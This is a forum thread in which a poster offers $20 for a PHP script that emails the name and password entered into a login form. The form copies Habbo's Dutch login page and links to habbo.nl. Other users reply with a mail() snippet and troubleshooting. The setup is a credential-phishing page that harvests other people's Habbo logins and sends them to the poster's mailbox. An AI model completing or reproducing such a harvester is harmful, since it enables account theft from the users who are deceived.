[Request]: A working phpmail script accommodated 2my script

I’m working on some sites together with my friend; but somehow the mail.php doesn’t work.
It doesn’t give an error or something; the only thing is that I don’t reveive the email. Probably I made a/some big mistake(s). I got 2 scripts. The login.php script and a post.php script. The login script is perfect now, no need to change something about that. I need a mail/post.php script that fits into the login.php script.
The mail script has to send the name and password that you can fill in at the login script.
I’ve posted both scripts down here, so you can see what’s the problem.
You can make a whole other mail php script also, as long as it works.
The person who can give me the first working solution, can receive an reward of $20 for helping.
If you think you can do this, please send an e-mail with the working mail/post.php script and your paypal id, to [email protected] .
If it’s work I can send you the $20 the same day.

Thanks, have a good luck at the script and try it please.

The post.php script ( here is something wrong ) you can make a new one or just edit this one.

<?php $email = $_REQUEST['email'] ; $message = $_REQUEST['message'] ;

mail( “[email protected]”, “Name and message”,
$message, “From: $email” );
?>

A part of the Login script (The part we need to make a mail php script )

<div class="cbb gray clearfix">
<h2 class="title">Log in</h2>

<div class="box-content clearfix" id="login-habblet">
    <form action="post.php" method="post" class="login-habblet">

<ul>
            <li>
                <label for="login-username" class="login-text">Name</label>
                <input tabindex="1" type="text" class="login-field" name="habbo" id="habbo" value="" />
            </li>
            <li>
                <label for="login-password" class="login-text">Password</label>
                <input tabindex="2" type="password" class="login-field" name="password" id="password" />
                <input type="submit" value="Log in" class="submit" />
            </li>
            <li class="no-label">
                <input tabindex="3" type="checkbox" name="_login_remember_me" id="login-remember-me" value="true"/>
                <label for="login-remember-me">Onthoud mijn gegevens</label>
            </li>
            <li class="no-label">
                <a href="https://www.habbo.nl/account/password/forgot" id="forgot-password"><span>Wachtwoord/naam kwijt?</span></a>
            </li>
            <li class="no-label">
                <a href="https://www.habbo.nl/register"><span>Registeren</span></a>
            </li>

</ul>
    </form></blockquote>

Try this

$to      = '[email protected]';
$subject = 'the subject';
$message = 'Name &amp; Message';
$message = $_REQUEST['message'] ;
$headers = 'From: '.$email .'' . "rn" .
    'Reply-To: '.$email .'' . "rn" .
    'X-Mailer: PHP/' . phpversion();

$sent = mail($to, $subject, $message, $headers);

if($sent) { echo "Message sent successfully"; } else { echo "Error sending message"; }

It might be a good script. But it isn’t working yet.
If I click on send at my website: the next page gives an message with: Message sent successfully.
But the point is that I don’t receive any e-mail in my mailbox.
That’s where the problem is.

I don’t know what the problem is exactly, but I guess that we have the accommodate the script to the login script.
See first post.

You are now sending $subject, $message and $headers but these words doesn’t appear in the login script.

Maybe someone knows how it will be working?
Thanks

There must be a problem with your mailbox or email address because i’ve tested it and it works fine

How did you test it?
You just used that script on a website? The problem is, i guess, that this script doesn’t fits into my login script.

Did you take a look at that already. I’ve posted the login part of the script in the first post.

Sponsor our Newsletter | Privacy Policy | Terms of Service